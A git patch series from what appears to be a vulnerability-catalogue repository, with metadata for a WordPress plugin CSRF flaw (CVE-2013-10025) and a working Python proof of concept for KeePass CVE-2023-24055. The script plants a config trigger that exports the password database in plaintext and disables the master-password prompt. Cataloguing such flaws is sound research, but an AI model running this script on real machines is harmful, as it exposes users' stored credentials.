From f17b4da67463fb333ebba5f2ea71162b81822bea Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?= Date: Tue, 11 Apr 2023 07:47:01 +0000 Subject: [PATCH 01/23] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20Exit=20Strategy?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Exit Strategy/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Exit Strategy/.keep diff --git a/cve/Exit Strategy/.keep b/cve/Exit Strategy/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From ae672e33bdeb17c10682bfa17cd8f34e183a78d1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?= Date: Tue, 11 Apr 2023 07:47:23 +0000 Subject: [PATCH 02/23] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2013-10025?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Exit Strategy/CVE-2013-10025/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Exit Strategy/CVE-2013-10025/.keep diff --git a/cve/Exit Strategy/CVE-2013-10025/.keep b/cve/Exit Strategy/CVE-2013-10025/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 74594a647b8901d6243f40dd4fe4f6f52204fd5b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?= Date: Tue, 11 Apr 2023 07:48:19 +0000 Subject: [PATCH 03/23] add cve/Exit Strategy/CVE-2013-10025/CVE-2013-10025.php. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王一名 --- .../CVE-2013-10025/CVE-2013-10025.php | 42 +++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 cve/Exit Strategy/CVE-2013-10025/CVE-2013-10025.php diff --git a/cve/Exit Strategy/CVE-2013-10025/CVE-2013-10025.php b/cve/Exit Strategy/CVE-2013-10025/CVE-2013-10025.php new file mode 100644 index 00000000..d0ee8f03 --- /dev/null +++ b/cve/Exit Strategy/CVE-2013-10025/CVE-2013-10025.php @@ -0,0 +1,42 @@ +@@ -3,18 +3,21 @@ +/** + * @package Wordpress Exit Strategy + * @author Bouzid Nazim Zitouni + * @version 1.55 + * @version 1.59 + */ +/* +Plugin Name: Wordpress Exit Strategy +Plugin URI: http://angrybyte.com/wordpress-plugins/wordpress-exit-strategy/ +Description: Exit Strategy will pass all outgoing links from your site through a nofollow link to an exit page before finally being redirected to the external link. You may place anything in your exit page: Ads, Subscribtion buttons, etc. Using Wordpress Exit Strategy you improve your SEO score by not linking directly to external pages, you get more subscribers & more revenues if you use Ads. +Author: Bouzid Nazim Zitouni +Version: 1.55 +Version: 1.59 +Author URI: http://angrybyte.com +*/ + + +if(!function_exists('add_action')){ + echo ""; // someone is trying to run the plugin directly, added to avoid full path disclosure. + die; +} +add_option("exitpagecontents", + 'Thank you for your visit, You`ll be redirected in %n% seconds
Click here if you are not redirected automatically', + 'Contents of the Exit page', 'yes'); +@@ -35,7 +38,7 @@ function exitpageadmin() +function exit_page_admin() +{ + + if ($_POST['xx']) + if (($_POST["xx"])&& (is_admin())&& check_admin_referer( 'exit_strategy_save', 'exit_strategy_nonce' )) + { + update_option('exitpagecontents', $_POST['xx']); + update_option('redirecttoparent', $_POST['redirectpar']); +@@ -83,7 +86,7 @@ function exit_page_admin() + { + echo ""; + } + + wp_nonce_field( 'exit_strategy_save','exit_strategy_nonce' ); + echo <<< EOFT +
-- Gitee From cc49df309bc533b41a074d25d497c9475b6c1113 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?= Date: Tue, 11 Apr 2023 07:48:51 +0000 Subject: [PATCH 04/23] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Exit=20Strategy/CVE-2013-10025/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Exit Strategy/CVE-2013-10025/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Exit Strategy/CVE-2013-10025/.keep diff --git a/cve/Exit Strategy/CVE-2013-10025/.keep b/cve/Exit Strategy/CVE-2013-10025/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 9a6f9fb5017a16d6a12b5e720ddd4419b62ea5d5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?= Date: Tue, 11 Apr 2023 07:50:39 +0000 Subject: [PATCH 05/23] add cve/Exit Strategy/CVE-2013-10025/READ ME.md. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王一名 --- cve/Exit Strategy/CVE-2013-10025/READ ME.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Exit Strategy/CVE-2013-10025/READ ME.md diff --git a/cve/Exit Strategy/CVE-2013-10025/READ ME.md b/cve/Exit Strategy/CVE-2013-10025/READ ME.md new file mode 100644 index 00000000..e69de29b -- Gitee From c9c2bd453d977bad675c15c176fc22c1d97dd7eb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?= Date: Tue, 11 Apr 2023 07:50:51 +0000 Subject: [PATCH 06/23] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Exit=20Strategy/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Exit Strategy/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Exit Strategy/.keep diff --git a/cve/Exit Strategy/.keep b/cve/Exit Strategy/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 9731884de359db82f31c952513f0ce09f6d09aad Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?= Date: Tue, 11 Apr 2023 07:50:56 +0000 Subject: [PATCH 07/23] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Exit Strategy/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Exit Strategy/yaml/.keep diff --git a/cve/Exit Strategy/yaml/.keep b/cve/Exit Strategy/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 48a2dbb4faf466f587be20245c283a1e67791575 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?= Date: Tue, 11 Apr 2023 07:51:23 +0000 Subject: [PATCH 08/23] add cve/Exit Strategy/yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王一名 --- cve/Exit Strategy/yaml/CVE-2013-10025.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Exit Strategy/yaml/CVE-2013-10025.yaml diff --git a/cve/Exit Strategy/yaml/CVE-2013-10025.yaml b/cve/Exit Strategy/yaml/CVE-2013-10025.yaml new file mode 100644 index 00000000..e69de29b -- Gitee From 22246a0ad304fc0eb8427adf20cac1c27eeb0465 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?= Date: Tue, 11 Apr 2023 07:55:38 +0000 Subject: [PATCH 09/23] update cve/Exit Strategy/yaml/CVE-2013-10025.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王一名 --- cve/Exit Strategy/yaml/CVE-2013-10025.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) diff --git a/cve/Exit Strategy/yaml/CVE-2013-10025.yaml b/cve/Exit Strategy/yaml/CVE-2013-10025.yaml index e69de29b..6206c59f 100644 --- a/cve/Exit Strategy/yaml/CVE-2013-10025.yaml +++ b/cve/Exit Strategy/yaml/CVE-2013-10025.yaml @@ -0,0 +1,21 @@ +id: CVE-2013-10025 +source: https://github.com/wp-plugins/exit-strategy/commit/d964b8e961b2634158719f3328f16eda16ce93ac +info: + name: Exit Strategy Plugin 1.55 + severity: medium + description: | + 在Exit Strategy Plugin 1.55中发现一个漏洞,并将其归类为有问题。受此问题影响的是文件exitpage.php中的函数exitpageadmin。该操作会导致跨站请求伪造。该攻击可能是远程发起的。升级到1.59版本能够解决这个问题。 + scope-of-influence: + Docker 20.10.15, build fd82621 + reference: + - https://github.com/wp-plugins/exit-strategy/commit/d964b8e961b2634158719f3328f16eda16ce93ac + - https://vuldb.com/?ctiid.225266 + - https://vuldb.com/?id.225266 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2013-10025 + cwe-id: CWE-352 + cnvd-id: None + kve-id: None + tags: Exit Strategy \ No newline at end of file -- Gitee From 15029974a7c8ac3f7a0f2551853925ec602e66ec Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?= Date: Tue, 11 Apr 2023 07:55:47 +0000 Subject: [PATCH 10/23] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Exit=20Strategy/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Exit Strategy/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Exit Strategy/yaml/.keep diff --git a/cve/Exit Strategy/yaml/.keep b/cve/Exit Strategy/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 93021199397d027498d3007b58528c5fca28e213 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?= Date: Tue, 11 Apr 2023 07:57:09 +0000 Subject: [PATCH 11/23] update other_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王一名 --- other_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/other_list.yaml b/other_list.yaml index ede901d9..1a41f3fc 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -58,5 +58,7 @@ cve: - CVE-2022-30525 WordPress: - CVE-2019-8942 + Exit Strategy: + - CVE-2013-10025 cnvd: -- Gitee From 4e541f95579aaa8a603d5d1f5b912a3e8c995746 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?= Date: Tue, 11 Apr 2023 08:29:11 +0000 Subject: [PATCH 12/23] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Exit=20Strategy?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../CVE-2013-10025/CVE-2013-10025.php | 42 ------------------- cve/Exit Strategy/CVE-2013-10025/READ ME.md | 0 cve/Exit Strategy/yaml/CVE-2013-10025.yaml | 21 ---------- 3 files changed, 63 deletions(-) delete mode 100644 cve/Exit Strategy/CVE-2013-10025/CVE-2013-10025.php delete mode 100644 cve/Exit Strategy/CVE-2013-10025/READ ME.md delete mode 100644 cve/Exit Strategy/yaml/CVE-2013-10025.yaml diff --git a/cve/Exit Strategy/CVE-2013-10025/CVE-2013-10025.php b/cve/Exit Strategy/CVE-2013-10025/CVE-2013-10025.php deleted file mode 100644 index d0ee8f03..00000000 --- a/cve/Exit Strategy/CVE-2013-10025/CVE-2013-10025.php +++ /dev/null @@ -1,42 +0,0 @@ -@@ -3,18 +3,21 @@ -/** - * @package Wordpress Exit Strategy - * @author Bouzid Nazim Zitouni - * @version 1.55 - * @version 1.59 - */ -/* -Plugin Name: Wordpress Exit Strategy -Plugin URI: http://angrybyte.com/wordpress-plugins/wordpress-exit-strategy/ -Description: Exit Strategy will pass all outgoing links from your site through a nofollow link to an exit page before finally being redirected to the external link. You may place anything in your exit page: Ads, Subscribtion buttons, etc. Using Wordpress Exit Strategy you improve your SEO score by not linking directly to external pages, you get more subscribers & more revenues if you use Ads. -Author: Bouzid Nazim Zitouni -Version: 1.55 -Version: 1.59 -Author URI: http://angrybyte.com -*/ - - -if(!function_exists('add_action')){ - echo ""; // someone is trying to run the plugin directly, added to avoid full path disclosure. - die; -} -add_option("exitpagecontents", - 'Thank you for your visit, You`ll be redirected in %n% seconds
Click here if you are not redirected automatically', - 'Contents of the Exit page', 'yes'); -@@ -35,7 +38,7 @@ function exitpageadmin() -function exit_page_admin() -{ - - if ($_POST['xx']) - if (($_POST["xx"])&& (is_admin())&& check_admin_referer( 'exit_strategy_save', 'exit_strategy_nonce' )) - { - update_option('exitpagecontents', $_POST['xx']); - update_option('redirecttoparent', $_POST['redirectpar']); -@@ -83,7 +86,7 @@ function exit_page_admin() - { - echo ""; - } - - wp_nonce_field( 'exit_strategy_save','exit_strategy_nonce' ); - echo <<< EOFT -
diff --git a/cve/Exit Strategy/CVE-2013-10025/READ ME.md b/cve/Exit Strategy/CVE-2013-10025/READ ME.md deleted file mode 100644 index e69de29b..00000000 diff --git a/cve/Exit Strategy/yaml/CVE-2013-10025.yaml b/cve/Exit Strategy/yaml/CVE-2013-10025.yaml deleted file mode 100644 index 6206c59f..00000000 --- a/cve/Exit Strategy/yaml/CVE-2013-10025.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: CVE-2013-10025 -source: https://github.com/wp-plugins/exit-strategy/commit/d964b8e961b2634158719f3328f16eda16ce93ac -info: - name: Exit Strategy Plugin 1.55 - severity: medium - description: | - 在Exit Strategy Plugin 1.55中发现一个漏洞,并将其归类为有问题。受此问题影响的是文件exitpage.php中的函数exitpageadmin。该操作会导致跨站请求伪造。该攻击可能是远程发起的。升级到1.59版本能够解决这个问题。 - scope-of-influence: - Docker 20.10.15, build fd82621 - reference: - - https://github.com/wp-plugins/exit-strategy/commit/d964b8e961b2634158719f3328f16eda16ce93ac - - https://vuldb.com/?ctiid.225266 - - https://vuldb.com/?id.225266 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N - cvss-score: 4.3 - cve-id: CVE-2013-10025 - cwe-id: CWE-352 - cnvd-id: None - kve-id: None - tags: Exit Strategy \ No newline at end of file -- Gitee From db328e210058d88e928547c10b99fd32f71c6e86 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?= Date: Tue, 11 Apr 2023 08:29:47 +0000 Subject: [PATCH 13/23] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20XML?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/XML/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/XML/.keep diff --git a/cve/XML/.keep b/cve/XML/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 8f92811388cfd6cca71cfe3cebf933a73e289f6e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?= Date: Tue, 11 Apr 2023 08:30:11 +0000 Subject: [PATCH 14/23] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/XML/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/XML/yaml/.keep diff --git a/cve/XML/yaml/.keep b/cve/XML/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 7c1b9b6654d81a73e7907d7595279a5d77935e67 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?= Date: Tue, 11 Apr 2023 08:30:30 +0000 Subject: [PATCH 15/23] add cve/XML/yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王一名 --- cve/XML/yaml/CVE-2023-24055.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/XML/yaml/CVE-2023-24055.yaml diff --git a/cve/XML/yaml/CVE-2023-24055.yaml b/cve/XML/yaml/CVE-2023-24055.yaml new file mode 100644 index 00000000..e69de29b -- Gitee From 4ce716bf9ba7dfab58d480e59816f64386b40ff7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?= Date: Tue, 11 Apr 2023 08:30:46 +0000 Subject: [PATCH 16/23] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/XML/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/XML/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/XML/yaml/.keep diff --git a/cve/XML/yaml/.keep b/cve/XML/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 0eeb7d72696c2108fd5b7ff20dad117e0cfdaf91 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?= Date: Tue, 11 Apr 2023 08:30:57 +0000 Subject: [PATCH 17/23] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2023-24055?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/XML/CVE-2023-24055/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/XML/CVE-2023-24055/.keep diff --git a/cve/XML/CVE-2023-24055/.keep b/cve/XML/CVE-2023-24055/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From a7523715d9f0e95bab0e53c392b42aa3e8a20474 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?= Date: Tue, 11 Apr 2023 08:31:25 +0000 Subject: [PATCH 18/23] add cve/XML/CVE-2023-24055/CVE-2023-24055.py. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王一名 --- cve/XML/CVE-2023-24055/CVE-2023-24055.py | 74 ++++++++++++++++++++++++ 1 file changed, 74 insertions(+) create mode 100644 cve/XML/CVE-2023-24055/CVE-2023-24055.py diff --git a/cve/XML/CVE-2023-24055/CVE-2023-24055.py b/cve/XML/CVE-2023-24055/CVE-2023-24055.py new file mode 100644 index 00000000..d67da402 --- /dev/null +++ b/cve/XML/CVE-2023-24055/CVE-2023-24055.py @@ -0,0 +1,74 @@ +import os +from lxml import etree + +print('CVE-2029-24055 POC') +print('======================') +print('!!! Warning !!!') +print('!!! This tool will try to add a Trigger so that the KeePass database is exported without protection!') +print('!!! This tool does not check for anything and will just overwrite whatever it wants to!') +print('!!! No backup, no mercy! Chances are high that this tool will leave your KeePass config in a corrupted state!') +print('!!! No functionality is guaranteed! Use at your own risk!') +print('See: https://sourceforge.net/p/keepass/discussion/329220/thread/a146e5cf6b/') +print('======================') +if os.name != 'nt': + print('Sorry, this tool works only under Windows!') + exit(1) + +# Get path to default config +config_file=os.getenv('APPDATA')+"\KeePass\KeePass.config.xml" +print(f"Reading from this config file: {config_file}") + +# Read Config +tree = etree.parse(config_file) +root = tree.getroot() + +# parse trough all Triggers to remove old versions +for trigger in root.findall("./Application/TriggerSystem/Triggers/"): + if trigger.find('Guid').text == "yjxXO87yOkOtkWWCrf2CXQ==": + print("Removing old trigger!") + parent = trigger.getparent() + parent.remove(trigger) + +# Add malicious content +triggers = root.find("./Application/TriggerSystem/") +new_trigger = etree.SubElement(triggers, "Trigger") +new_guid = etree.SubElement(new_trigger, "Guid") +new_guid.text = "yjxXO87yOkOtkWWCrf2CXQ==" +new_name = etree.SubElement(new_trigger, "Name") +new_name.text = "Malicious export" +new_events = etree.SubElement(new_trigger, "Events") +new_event = etree.SubElement(new_events, "Event") +new_typeguid = etree.SubElement(new_event, "TypeGuid") +new_typeguid.text = "5f8TBoW4QYm5BvaeKztApw==" # on openening database... +new_parameters = etree.SubElement(new_event, "Parameters") +new_parameter = etree.SubElement(new_parameters, "Parameter") +new_parameter.text = "0" +etree.SubElement(new_parameters, "Parameter") +etree.SubElement(new_trigger, "Conditions") +new_actions = etree.SubElement(new_trigger, "Actions") +new_action = etree.SubElement(new_actions, "Action") +new_typeguid = etree.SubElement(new_action, "TypeGuid") +new_typeguid.text = "D5prW87VRr65NO2xP5RIIg==" # ... do malicious export +new_parameters = etree.SubElement(new_action, "Parameters") +new_parameter = etree.SubElement(new_parameters, "Parameter") +new_parameter.text = "c:\\Users\\%USERNAME%\\KeepassExport.csv" +new_parameter = etree.SubElement(new_parameters, "Parameter") +new_parameter.text = "KeePass CSV (1.x)" +etree.SubElement(new_parameters, "Parameter") +etree.SubElement(new_parameters, "Parameter") + +# Disable Security policy +exportnokey = root.find("./Security/Policy/ExportNoKey") +try: + print("Removing old Policy!") + parent = exportnokey.getparent() + parent.remove(exportnokey) +except: + pass + +policy = root.find("./Security/Policy") +export_no_key = etree.SubElement(policy, "ExportNoKey") +export_no_key.text = "true" + +#config_file=os.getenv('APPDATA')+"\KeePass\KeePass.config-BAK.xml" +tree.write(config_file, encoding='utf-8', xml_declaration=True) \ No newline at end of file -- Gitee From db23a27170ddbeb4022ef616eabbf8b936758a34 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?= Date: Tue, 11 Apr 2023 08:31:32 +0000 Subject: [PATCH 19/23] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/XML/CVE-2023-24055/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/XML/CVE-2023-24055/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/XML/CVE-2023-24055/.keep diff --git a/cve/XML/CVE-2023-24055/.keep b/cve/XML/CVE-2023-24055/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 7564d818e4476234f262da1390e008f9765b724c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?= Date: Tue, 11 Apr 2023 08:32:49 +0000 Subject: [PATCH 20/23] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/XML/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/XML/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/XML/.keep diff --git a/cve/XML/.keep b/cve/XML/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 59b9ae71cc072c6dbe8571da2b68439e2abcd45c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?= Date: Tue, 11 Apr 2023 08:35:45 +0000 Subject: [PATCH 21/23] update cve/XML/yaml/CVE-2023-24055.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王一名 --- cve/XML/yaml/CVE-2023-24055.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/cve/XML/yaml/CVE-2023-24055.yaml b/cve/XML/yaml/CVE-2023-24055.yaml index e69de29b..fa15b0d0 100644 --- a/cve/XML/yaml/CVE-2023-24055.yaml +++ b/cve/XML/yaml/CVE-2023-24055.yaml @@ -0,0 +1,20 @@ +id: CVE-2023-24055 +source: + https://github.com/deetl/CVE-2023-24055 +info: + name: XML + severity: medium + description: | + KeePass通过2.53(在默认安装中)允许拥有写入XML配置文件的权限攻击者,通过添加一个导出触发器来获得明文密码。 + reference: + - https://securityboulevard.com/2023/01/keepass-password-manager-leak-cve-richixbw/ + - https://sourceforge.net/p/keepass/discussion/329220/thread/a146e5cf6b/ + - https://sourceforge.net/p/keepass/feature-requests/2773/ + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N + cvss-score: 5.5 + cve-id: CVE-2023-24055 + cwe-id: CWE-312 + cnvd-id: None + kve-id: None + tags: XML \ No newline at end of file -- Gitee From a55d66cc919c3ec91773ea479f10158c53475458 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?= Date: Tue, 11 Apr 2023 08:36:26 +0000 Subject: [PATCH 22/23] add cve/XML/CVE-2023-24055/READ ME.md. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王一名 --- cve/XML/CVE-2023-24055/READ ME.md | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 cve/XML/CVE-2023-24055/READ ME.md diff --git a/cve/XML/CVE-2023-24055/READ ME.md b/cve/XML/CVE-2023-24055/READ ME.md new file mode 100644 index 00000000..f0bfb5fa --- /dev/null +++ b/cve/XML/CVE-2023-24055/READ ME.md @@ -0,0 +1,5 @@ +CVE-2023-24055的概念验证代码 + +该工具将打开目录%APPDATA%\Roaming\KeePass\KeePass.config.xml,并将添加一个触发器到KeePass的配置中,以便当前数据库在打开时被导出到c:\Users\%USERNAME%\KeepassExport.csv。 + +参数ExportNoKey被设置为 "true",这样KeePass就不会在导出过程中要求提供主密码。 \ No newline at end of file -- Gitee From 8d4e36456a18900f0b0ac29365276802d91b7fed Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E4=B8=80=E5=90=8D?= Date: Tue, 11 Apr 2023 08:37:17 +0000 Subject: [PATCH 23/23] update openkylin_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王一名 --- openkylin_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 211571f6..85d3766d 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -182,3 +182,5 @@ kve: - KVE-2022-0206 kylin-activation: - KVE-2022-0231 + XML: + - CVE-2023-24055 \ No newline at end of file -- Gitee